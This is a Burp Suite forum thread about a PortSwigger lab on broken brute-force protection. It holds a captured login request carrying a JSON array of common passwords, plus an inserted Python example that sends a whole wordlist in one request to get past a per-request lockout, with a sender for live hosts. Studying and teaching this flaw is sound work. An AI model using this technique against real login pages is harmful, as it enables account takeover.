Burp Suite User Forum


Lab: Broken brute-force protection, multiple credentials per request

phaneendra | Last updated: Dec 23, 2020 04:51PM UTC

When I try to paste the whole list of passwords, it gives the error below. I observed that for any Content-Length beyond 224 it gives this error. I am not sure whether my observation is wrong and may be useless.

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 21

Internal Server Error

Uthman, PortSwigger Agent | Last updated: Dec 23, 2020 05:31PM UTC

Can you share the full Repeater request, please?

eh.harshit | Last updated: Dec 29, 2020 08:49AM UTC

POST /login HTTP/1.1
Host: ac9b1fe81f35523480c90505005f0064.web-security-academy.net
Connection: close
Content-Length: 1239
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ac9b1fe81f35523480c90505005f0064.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ac9b1fe81f35523480c90505005f0064.web-security-academy.net/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=GuKGURggP9ol9uaRBrzq0VfZ7LojKm4h

{"csrf":"KkWBycuV6K2aKFZpRIYAEAZ5Ak6zgsb7","username" : "carlos", "password" : [ "123456", "password", "12345678", "qwerty", "123456789", "12345", "1234", "111111", "1234567", "dragon", "123123", "baseball", "abc123", "football", "monkey", "letmein", "shadow", "master", "666666", "qwertyuiop", "123321", "mustang", "1234567890", "michael", "654321", "superman", "1qaz2wsx", "7777777", "121212", "000000", "qazwsx", "123qwe", "killer", "trustno1", "jordan", "jennifer", "zxcvbnm", "asdfgh", "hunter", "buster", "soccer", "harley", "batman", "andrew", "tigger", "sunshine", "iloveyou", "2000", "charlie", "robert", "thomas", "hockey", "ranger", "daniel", "starwars", "klaster", "112233", "george", "computer", "michelle", "jessica", "pepper", "1111", "zxcvbn", "555555", "11111111", "131313", "freedom", "777777", "pass", "maggie", "159753", "aaaaaa", "ginger", "princess", "joshua", "cheese", "amanda", "summer", "love", "ashley", "nicole", "chelsea", "biteme", "matthew", "access", "yankees", "987654321", "dallas", "austin", "thunder", "taylor", "matrix", "mobilemail", "mom", "monitor", "monitoring", "montana", "moon", "moscow", ]}

eh.harshit | Last updated: Dec 29, 2020 09:05AM UTC

You have to change the values. If you entered the "carlos" username, after capturing the request you can modify it in Repeater and paste all the passwords in one string. Then it decreases the Content-Length and it shows 302 Found in the response. I tried it and it's done.
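
The technique the reply above describes, as an added example that is not code from this thread or from PortSwigger's lab: the password field is sent as a JSON array, so a single request carries the whole wordlist and a lockout that counts requests (rather than credentials) never triggers. The server-side check below is a hypothetical reimplementation written to show why a list satisfies the comparison; the stored password, CSRF token and hostname are constructed for the example. The request builder uses json.dumps, which always emits valid JSON. Note that strict JSON parsers reject a trailing comma such as the `"moscow", ]` in the request posted earlier in this thread; whether or not that is what produced the lab's 500, hand-edited arrays are worth validating before sending.

```python
"""Added example: one-request, many-credential login against a per-request lockout.

Not PortSwigger's code. The LoginServer class is a hypothetical model of the
vulnerable check; USERS, the CSRF token and the hostname are constructed.
"""
import json
import urllib.request
from typing import Callable, Dict, Iterable

# Constructed sample account (assumption, not the lab's real credential).
USERS: Dict[str, str] = {"carlos": "montoya"}


class LoginServer:
    """Hypothetical vulnerable server: lockout counts requests, not passwords."""

    def __init__(self, lockout_after: int = 3) -> None:
        self.failures: Dict[str, int] = {}
        self.lockout_after = lockout_after

    def login(self, body: str) -> int:
        """Return an HTTP status code for a JSON login body."""
        try:
            data = json.loads(body)
        except ValueError:
            return 500  # malformed JSON (e.g. a trailing comma in the array)
        user = data.get("username")
        submitted = data.get("password")
        if self.failures.get(user, 0) >= self.lockout_after:
            return 401  # locked out: too many failed *requests*
        real = USERS.get(user)
        # The bug: a list is accepted and checked by membership, so every
        # element of the array is tested while the counter moves by one.
        candidates = submitted if isinstance(submitted, list) else [submitted]
        if real is not None and real in candidates:
            self.failures[user] = 0
            return 302  # redirect to the account page on success
        self.failures[user] = self.failures.get(user, 0) + 1
        return 401


def build_login_body(csrf: str, username: str, passwords: Iterable[str]) -> str:
    """Serialize one login request carrying every candidate password.

    json.dumps guarantees well-formed JSON, which a hand-pasted array does not.
    """
    return json.dumps({"csrf": csrf, "username": username, "password": list(passwords)})


def multi_credential_login(send: Callable[[str], int], csrf: str,
                           username: str, wordlist: Iterable[str]) -> bool:
    """Send the whole wordlist in a single request; True when the server answers 302."""
    return send(build_login_body(csrf, username, wordlist)) == 302


def http_sender(login_url: str, session_cookie: str) -> Callable[[str], int]:
    """Build a sender for a real target (assumed URL and cookie; not called here)."""
    def send(body: str) -> int:
        req = urllib.request.Request(
            login_url, data=body.encode(), method="POST",
            headers={"Content-Type": "text/plain;charset=UTF-8",
                     "Cookie": f"session={session_cookie}"})
        # Disable redirect following so the 302 itself is observable.
        opener = urllib.request.build_opener(NoRedirect())
        try:
            return opener.open(req).status
        except urllib.error.HTTPError as err:
            return err.code
    return send


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Return the 302 instead of following it."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


if __name__ == "__main__":
    server = LoginServer()
    wordlist = ["123456", "password", "qwerty", "montoya"]  # constructed list
    print(multi_credential_login(server.login, "KkWB...", "carlos", wordlist))
```

Against a live target, replace `server.login` with `http_sender("https://<lab-host>/login", "<session cookie>")`; the host and cookie come from your own Repeater capture. The model also shows why the one-password-per-request approach fails: three separate wrong guesses lock the account before the correct one is tried.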

phaneendra | Last updated: Dec 30, 2020 08:38AM UTC

Thanks @eh.harshit

Mohammed | Last updated: May 16, 2021 03:57AM UTC

I too got the same problem, what is the solution

Liam, PortSwigger Agent | Last updated: May 17, 2021 08:50AM UTC

Have you checked out this video solution? - https://www.youtube.com/watch?v=1Cg0lLGZXBA
